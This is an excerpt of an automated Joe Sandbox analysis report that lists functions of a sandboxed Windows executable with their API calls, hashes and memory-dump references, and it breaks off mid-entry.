Opcode Fuzzy Hash: 5e294417475fa9ccfc96ab376db2e8bf88e857038c492588a20956d033cd74eb
Instruction Fuzzy Hash: 4AA011C2AA8802BC300832822E02C3B020FC0C3F28330882EF80AC0080A8820C020C30

Function 006AE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 1b42a548be418cfcd3592d43d156530464d612cb6af3b989f790d2499c99848f
Instruction ID: aa7ca2b07cec4814a1bd0479037a0c21df3f79e5e5ce5f5c5cee175d12b44d5b
Opcode Fuzzy Hash: 1b42a548be418cfcd3592d43d156530464d612cb6af3b989f790d2499c99848f
Instruction Fuzzy Hash: 4AA011C2AA8802BC300832822E02C3B020FC0C3F28330882EF80AC0080A8820C020C30

Function 006AE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 2j
API String ID: 1269201914-2714872843
Opcode ID: 8d70bda2be5e387dcfb747169c54ecaa9b55fd0cbe61b09a38763595fecedb70
Instruction ID: aa7ca2b07cec4814a1bd0479037a0c21df3f79e5e5ce5f5c5cee175d12b44d5b
Opcode Fuzzy Hash: 8d70bda2be5e387dcfb747169c54ecaa9b55fd0cbe61b09a38763595fecedb70
Instruction Fuzzy Hash: 4AA011C2AA8802BC300832822E02C3B020FC0C3F28330882EF80AC0080A8820C020C30

Function 006BBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 006BB7BB: GetOEMCP.KERNEL32(00000000,?,?,006BBA44,?), ref: 006BB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,006BBA89,?,00000000), ref: 006BBC64
GetCPInfo.KERNEL32(00000000,006BBA89,?,?,?,006BBA89,?,00000000), ref: 006BBC77

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 2349b31b1cdc5abcfba4227e6489b717aa3c1d4da8b7c30ce031a5b2e94adbf7
Instruction ID: 33c19df8176f53696291b2d2801a68752e098156ddb68839df406ac507522729
Opcode Fuzzy Hash: 2349b31b1cdc5abcfba4227e6489b717aa3c1d4da8b7c30ce031a5b2e94adbf7
Instruction Fuzzy Hash: 135116B09002459FDB20DF75C891AFABBF7EF41300F18646ED4968B352D7B99986CB90

Function 00699A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00699A50,?,?,00000000,?,?,00698CBC,?), ref: 00699BAB
GetLastError.KERNEL32(?,00000000,00698411,-00009570,00000000,000007F3), ref: 00699BB6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 6d377ea535c992d45727c6e5d18e34695a822f93b5e868ae8332248719f00da9
Instruction ID: 3e690caddee2709a7ec5e888cae574c8554bbe15a3a5cc6d9693d23d1954794a
Opcode Fuzzy Hash: 6d377ea535c992d45727c6e5d18e34695a822f93b5e868ae8332248719f00da9
Instruction Fuzzy Hash: 7F419F316043018BDF249F1DE5848ABB7EFFBD5320F14896DE89183B68D778AD458A71

Function 00691E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00691E55

Part of subcall function 00693BBA: __EH_prolog.LIBCMT ref: 00693BBF

_wcslen.LIBCMT ref: 00691EFD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: a0640eb1be4eacc0641861c7bd744aad7f20ac11b01afd42f7ec899096fcba80
Instruction ID: 229a0116843e2ef1e8e4bc4cc5a9c8ddf8b931dfac25e9179aa0515400902a46
Opcode Fuzzy Hash: a0640eb1be4eacc0641861c7bd744aad7f20ac11b01afd42f7ec899096fcba80
Instruction Fuzzy Hash: 79314C7190410A9FCF55EF98D945AEEBBFAAF09300F20045EF445AB651C7325E41DB64

Function 00699DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006973BC,?,?,?,00000000), ref: 00699DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00699E70

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: eccb0361938505205fff262f8585119b8d9682aa8509f4c34eb2711a8682a191
Instruction ID: 6d6c0aa31172e3f61adfd87bfc429889a0fd27793114ed606baad6a3a3583b4a
Opcode Fuzzy Hash: eccb0361938505205fff262f8585119b8d9682aa8509f4c34eb2711a8682a191
Instruction Fuzzy Hash: BC21D2312486459FCB14DF78C891AABBBE9AF56304F08491DF4C5C7A41D329D90D9B61

Function 0069966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00699F27,?,?,0069771A), ref: 006996E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00699F27,?,?,0069771A), ref: 00699716

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3eabdc3ae6209db5c822d4ef8916ce5a92bc802a183a243dc1b7829133eebbc4
Instruction ID: 13ed0a5343e4302183183829cd56cc32732ec7f2921c973a9076bf8d319c6a43
Opcode Fuzzy Hash: 3eabdc3ae6209db5c822d4ef8916ce5a92bc802a183a243dc1b7829133eebbc4
Instruction Fuzzy Hash: 4021EDB11003446EFB708A68CC89FF7B3DDEB49320F104A1DFA96C6AC1C774A8848A31

Function 00699E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00699EC7
GetLastError.KERNEL32 ref: 00699ED4

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a0a4d9f1007823465bdbd889411d0c47f7385557ceb71128d1de08cea06210cc
Instruction ID: 711ace1c52ba7d1a21b30acdb9c1d0f3fa8abcc0b99c74e974b4c7438f9df13f
Opcode Fuzzy Hash: a0a4d9f1007823465bdbd889411d0c47f7385557ceb71128d1de08cea06210cc
Instruction Fuzzy Hash: 9211A031A00700ABDB24DA28C840BA6B7EEAF45360F504A2DE162D2BD0D7B0AD498670

Function 006B8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006B8E75

Part of subcall function 006B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006BCA2C,00000000,?,006B6CBE,?,00000008,?,006B91E0,?,?,?), ref: 006B8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,006D1098,006917CE,?,?,00000007,?,?,?,006913D6,?,00000000), ref: 006B8EB1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 9082f1c95aa2613f4c1e3578a6efd12955d69378e242bd854d35d57db510cbca
Instruction ID: bd8a6781ac803baafbd7ac2d3e215a3571fc0543cf42eab12a4a8af1e14862b7
Opcode Fuzzy Hash: 9082f1c95aa2613f4c1e3578a6efd12955d69378e242bd854d35d57db510cbca
Instruction Fuzzy Hash: FDF0C2B22011126ECB212A25AC05BEF375F8FC1B70B24412AF914AB292DF70DDC3C7A4

Function 006A109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 006A10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 006A10B2

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 9533543bae5b6814fa90fd0bf2c7a267a9d2bb0dfd787964cc3cc0beb00960df
Instruction ID: 6ff6f4da8a8d545266edac6c71e3d0fe3f85602eda0597ee7ec4df2f419b46dd
Opcode Fuzzy Hash: 9533543bae5b6814fa90fd0bf2c7a267a9d2bb0dfd787964cc3cc0beb00960df
Instruction Fuzzy Hash: 2FE09233B00155A78F09ABB49C058EB72DFEA46204B148175E403DB201FD30EE414A60

Function 0069A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A501

Part of subcall function 0069BB03: _wcslen.LIBCMT ref: 0069BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A532

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: a11fdafb1034984377e27df6ebc8364ee6ec1a7d7519a658dab98cabef4a3a58
Instruction ID: a15fd5e71ebf4aaff814cc9d0dcc5427a08f17007dc8cda50f207fdef7d11b47
Opcode Fuzzy Hash: a11fdafb1034984377e27df6ebc8364ee6ec1a7d7519a658dab98cabef4a3a58
Instruction Fuzzy Hash: 23F03032240119BBDF016F60DC45FEA37AEBB04385F448055B945D5264DB71DA94DB54

Function 0069A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0069977F,?,?,006995CF,?,?,?,?,?,006C2641,000000FF), ref: 0069A1F1

Part of subcall function 0069BB03: _wcslen.LIBCMT ref: 0069BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0069977F,?,?,006995CF,?,?,?,?,?,006C2641), ref: 0069A21F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 4070e233457a1e201859c2733e1bd622f0c400ad6275969a93b32b1b51645ae5
Instruction ID: 4e7aa0b29a466d1e50c4e0b9306a344e204135de019fe743186b354c44f4ec03
Opcode Fuzzy Hash: 4070e233457a1e201859c2733e1bd622f0c400ad6275969a93b32b1b51645ae5
Instruction Fuzzy Hash: 76E092322502196BDF015F60DD45FE9379EBB08381F484025B945D2154EB62DE85DA64

Function 006AAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,006C2641,000000FF), ref: 006AACB0
CoUninitialize.COMBASE(?,?,?,?,006C2641,000000FF), ref: 006AACB5

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 3f75105e43419307921d0e84843274d94dd46c6460fc421452f4c584793f6492
Instruction ID: 0fa42c1344c282f5d035bca7c9e5f27f7fd77cf95ae410459db9cea28867afac
Opcode Fuzzy Hash: 3f75105e43419307921d0e84843274d94dd46c6460fc421452f4c584793f6492
Instruction Fuzzy Hash: A1E06572544651EFCB00DB5DDC06F55FBAAFB49B20F00426AF416D3760CB746D00CA94

Function 0069A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0069A23A,?,0069755C,?,?,?,?), ref: 0069A254

Part of subcall function 0069BB03: _wcslen.LIBCMT ref: 0069BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0069A23A,?,0069755C,?,?,?,?), ref: 0069A280

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: a94024347f063a113425715c891635696a14845e47dc41edda35ac97cc9b329a
Instruction ID: c336858cd6647a0e2e002639438f71a3fd6cdbd2705c18789f55e262fbf6cfaa
Opcode Fuzzy Hash: a94024347f063a113425715c891635696a14845e47dc41edda35ac97cc9b329a
Instruction Fuzzy Hash: 4BE092325001246BCF50BB68DC05BE9779EAB083E1F044261FD55E3294D771DE44CBE4

Function 006ADEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006ADEEC

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

SetDlgItemTextW.USER32(00000065,?), ref: 006ADF03

Part of subcall function 006AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006AB579
Part of subcall function 006AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006AB58A
Part of subcall function 006AB568: IsDialogMessageW.USER32(000103E4,?), ref: 006AB59E
Part of subcall function 006AB568: TranslateMessage.USER32(?), ref: 006AB5AC
Part of subcall function 006AB568: DispatchMessageW.USER32(?), ref: 006AB5B6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: ba30de0bde0ceabe2cb3442149862290d0eb584b7aa226814bf59cde75ddac5e
Instruction ID: 146da23118f0f29772b20000a0ac62b631ca716d21313dbeb7e7c846ff9e4025
Opcode Fuzzy Hash: ba30de0bde0ceabe2cb3442149862290d0eb584b7aa226814bf59cde75ddac5e
Instruction Fuzzy Hash: 8DE0D1718003483ADF41FB61DC0AFEE3BAE5B05785F440456B205D70B3DA75DA108B75

Function 006A081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006A0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0069F2D8,Crypt32.dll,00000000,0069F35C,?,?,0069F33E,?,?,?), ref: 006A0858

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: a19cd49e54870b5ccbcc7cc4ad9bc265e139bbf90dea65c1974bb9eb3c314b9a
Instruction ID: 067a21ad0292ec643103fa82c358112c3c031cdfae3513e9bdc5f43ed0f3be66
Opcode Fuzzy Hash: a19cd49e54870b5ccbcc7cc4ad9bc265e139bbf90dea65c1974bb9eb3c314b9a
Instruction Fuzzy Hash: 75E048765001287BDF11A794DC05FDA77ADFF093D1F044065B645D2104D674DA84CFB4

Function 006AA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 006AA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 006AA3E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: e9c741e6cef91d1ad44b1bf83dcdc828c7f69a7359adf3abc32378d64ae2f0b5
Instruction ID: 035de3b0c38c02d64bd27061fdccf528a516f16238c8c80711dc6e9452baacb2
